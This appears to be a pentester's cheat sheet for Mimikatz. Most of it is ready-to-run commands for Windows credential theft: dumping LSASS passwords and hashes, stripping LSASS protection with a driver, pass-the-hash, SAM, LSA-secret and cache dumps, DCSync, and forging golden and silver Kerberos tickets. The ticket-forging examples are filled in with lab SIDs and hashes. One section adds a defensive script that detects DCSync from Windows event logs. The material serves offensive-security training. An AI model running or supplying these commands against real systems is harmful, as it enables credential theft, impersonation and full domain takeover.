# Mimikatz

## Overview

> A little tool to play with Windows security.

{% embed url="<https://github.com/gentilkiwi/mimikatz>" %}

## Mimikatz cheat sheet

### Executing Mimikatz

#### Binary execution inline

```powershell
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
```

#### PowerShell in memory

```powershell
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
```

### sekurlsa

Sekurlsa is a Mimikatz module that can be used to perform various memory-related attacks and extract sensitive information from the LSASS process.

#### Extracting cleartext and hashed credentials from LSASS

This command dumps cleartext passwords and NTLM hashes from LSASS memory for every user currently logged on; `privilege::debug` is run first so that Mimikatz can read the LSASS process.

```powershell
privilege::debug
sekurlsa::logonPasswords
```

#### LSASS running with RunAsPPL

{% hint style="warning" %}
Check whether LSA runs as a protected process by querying the `Lsa` key and looking for a `RunAsPPL` value set to `0x1`:

```powershell
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
```

{% endhint %}

To bypass this we'll have to load `mimidriver.sys` from the Mimikatz repo. This driver needs to be in the same folder from which `mimikatz` is run.

```powershell
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
```

#### Extracting Kerberos tickets from memory

This command extracts Kerberos tickets from memory and saves them to a file.

```powershell
sekurlsa::tickets /export
```

{% hint style="info" %}
These tickets can then be used for pass-the-ticket attacks or offline password cracking.
{% endhint %}

#### Perform pass the hash

This command starts a new logon session (and process) for the specified user using the supplied NTLM hash instead of a password. It allows authenticating to any system that accepts NTLM authentication without knowing the cleartext password.

```powershell
sekurlsa::pth /user:<username> /ntlm:<hash>
sekurlsa::pth /domain:<domain_name> /user:<username> /ntlm:<hash>
```

#### Loading memory dump file

This command loads a previously captured minidump of the LSASS process from the specified file, so that the credentials it contains can be extracted offline (for example with `sekurlsa::logonpasswords` afterwards) instead of touching LSASS on the live host.

```powershell
sekurlsa::minidump <file_path>
```

### lsadump

The lsadump module in Mimikatz allows for the extraction of sensitive information from the Local Security Authority (LSA) subsystem of the Windows operating system.

#### SAM dump

This command dumps the SAM (Security Account Manager) database, which contains information about local user accounts and their password hashes.

```powershell
lsadump::sam
```

#### LSA dump

{% hint style="info" %}
Useful switches:

* /inject – inject into LSASS to extract credentials
* /name – account name of the target user account
* /id – RID of the target user account
* /patch – patch LSASS
{% endhint %}

This command patches the LSA subsystem to allow for the addition of new users or the modification of existing users without authentication.

```powershell
lsadump::lsa /patch
```

This command injects into LSASS and retrieves the credentials of the specified account (see the `/name` switch above), which can include plaintext passwords and hashes.

```powershell
lsadump::lsa /inject /name:<service_name>
```

#### LSA cache dump

This command dumps cached domain credentials from the LSA subsystem. These credentials can be used to authenticate to other systems on the network.

```powershell
lsadump::cache
```

#### LSA dump secrets

This command dumps various secrets stored in the LSA subsystem, including cached domain credentials, LSA secrets, and NTLM hashes.

```powershell
lsadump::secrets
```

#### DCSync

This command asks a domain controller to replicate the specified user account, as another domain controller would, and returns its password hash. With the hash, an attacker can impersonate that user.

```powershell
lsadump::dcsync /user:<username> /domain:<domain_name>
```
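Because DCSync works by exercising the replication control rights that only domain controllers normally use, it is one of the more detectable commands on this page. The following script is an added example (not part of the page or of Mimikatz): it inspects Windows Security event 4662 records (Directory Service object access, which requires "Audit Directory Service Access" to be enabled) for the three replication extended rights, and flags those requested by accounts that are not domain controller machine accounts. The GUIDs are the well-known `DS-Replication-Get-Changes` rights; the sample records are constructed, the `ConvertFrom-Event4662` helper and the `-AllowedAccounts` exception list are this example's own names.

```powershell
# Added example, not Mimikatz code: flag 4662 events that request replication rights
# from an account other than a DC machine account (a DCSync indicator).

# Extended rights exercised by a replication request (well-known schema GUIDs).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function ConvertFrom-Event4662 {
    # Flatten a real Get-WinEvent record into the fields the detection needs.
    param([Parameter(ValueFromPipeline = $true)] $Event)
    process {
        $data = @{}
        foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            TimeCreated     = $Event.TimeCreated
            SubjectUserName = $data['SubjectUserName']
            SubjectDomain   = $data['SubjectDomainName']
            ObjectType      = $data['ObjectType']
            Properties      = $data['Properties']
        }
    }
}

function Find-DcSyncAccess {
    param(
        [Parameter(ValueFromPipeline = $true)] $Record,
        # Non-DC accounts that legitimately replicate (e.g. an Azure AD Connect service
        # account); an empty list is the assumption here, fill it from your environment.
        [string[]]$AllowedAccounts = @()
    )
    process {
        $props = [string]$Record.Properties
        $hits  = @($ReplicationRights.Keys | Where-Object { $props -match $_ })
        if ($hits.Count -eq 0) { return }

        $subject = $Record.SubjectUserName
        # Machine accounts end in '$'; DCs replicate constantly, so they are excluded.
        # A compromised machine account would also pass this filter (see note below).
        if ($subject -like '*$' -or $AllowedAccounts -contains $subject) { return }

        [pscustomobject]@{
            TimeCreated = $Record.TimeCreated
            Subject     = "$($Record.SubjectDomain)\$subject"
            Rights      = ($hits | ForEach-Object { $ReplicationRights[$_] }) -join ', '
        }
    }
}

# Constructed sample records (not real logs): normal DC replication, an unrelated
# attribute read, and a user account requesting both Get-Changes rights.
$Sample = @(
    [pscustomobject]@{ TimeCreated = '2024-01-01 09:00:00'; SubjectUserName = 'DC02$'; SubjectDomain = 'CORP'
                       ObjectType = '%{19195a5b-6da0-11d0-afd3-00c04fd930c9}'
                       Properties = '%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}' }
    [pscustomobject]@{ TimeCreated = '2024-01-01 09:01:00'; SubjectUserName = 'jdoe'; SubjectDomain = 'CORP'
                       ObjectType = '%{bf967aba-0de6-11d0-a285-00aa003049e2}'
                       Properties = '%%7688 {bf967a9c-0de6-11d0-a285-00aa003049e2} {bf967aba-0de6-11d0-a285-00aa003049e2}' }
    [pscustomobject]@{ TimeCreated = '2024-01-01 09:02:00'; SubjectUserName = 'jdoe'; SubjectDomain = 'CORP'
                       ObjectType = '%{19195a5b-6da0-11d0-afd3-00c04fd930c9}'
                       Properties = '%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}' }
)

# Only the third record is reported: CORP\jdoe requesting Get-Changes and Get-Changes-All.
$Sample | Find-DcSyncAccess | Format-Table -AutoSize

# Live use on a domain controller (assumes Directory Service Access auditing is on):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4662 } -MaxEvents 5000 |
#     ConvertFrom-Event4662 | Find-DcSyncAccess
```

Two caveats a practitioner should keep in mind: the machine-account exclusion is a convenience, not a security boundary, since a DCSync from a stolen DC or server machine account would pass it (tighten it to the known DC names from `Get-ADDomainController` where that module is available), and the `Properties` field only lists the rights when object-access auditing is configured on the domain head, so confirm the event actually appears on your DCs before relying on this.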

### kerberos

#### Golden ticket

A Golden Ticket attack is a technique used by attackers to gain persistent access to a Windows domain. It involves the use of a forged Kerberos ticket, which allows an attacker to impersonate any user account in the domain and gain unrestricted access to any resource in the domain.

**Obtaining the krbtgt hash**

This command injects into LSASS and retrieves the credentials of the `krbtgt` account (via the `/name` switch), including its NTLM hash.

```powershell
lsadump::lsa /inject /name:krbtgt
```

**Creating the Golden ticket**

This command forges a Golden Ticket (a TGT) for the specified user, using the domain SID and the krbtgt NTLM hash captured above, and injects it into the current session with `/ptt`.

{% code overflow="wrap" %}

```powershell
kerberos::golden /user:[impersonating user] /domain:[domain] /sid:[domain sid] /krbtgt:[krbtgt hash] /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
```

{% endcode %}

{% hint style="info" %}
Example:

{% code overflow="wrap" %}

```powershell
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:msp.local /sid:S-1-5-21-2998733414-582960673-4099777928 /krbtgt:aae39b0f0f043e3a7eefc88a13560c80 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
```

{% endcode %}
{% endhint %}

#### Silver ticket

A Silver Ticket attack is another technique used by attackers to gain access to resources in a Windows domain. It involves the creation of a forged Kerberos ticket for a specific service, allowing an attacker to impersonate the service account and gain access to the resources associated with that service.

**Creating the Silver ticket**

{% code overflow="wrap" %}

```powershell
kerberos::golden /domain:[domain] /sid:[domain sid] /target:[target computer] /service:[service] /rc4:[service account hash/machine account hash] /user:[impersonating user] /ptt
```

{% endcode %}

{% hint style="info" %}
Example:

{% code overflow="wrap" %}

```powershell
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorpdc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'
```

{% endcode %}
{% endhint %}

### vault

Mimikatz's `vault` module extracts credentials stored in the Windows Credential Manager (the "vault").

```powershell
vault::cred /patch
```

## References

{% embed url="<https://github.com/gentilkiwi/mimikatz>" %}
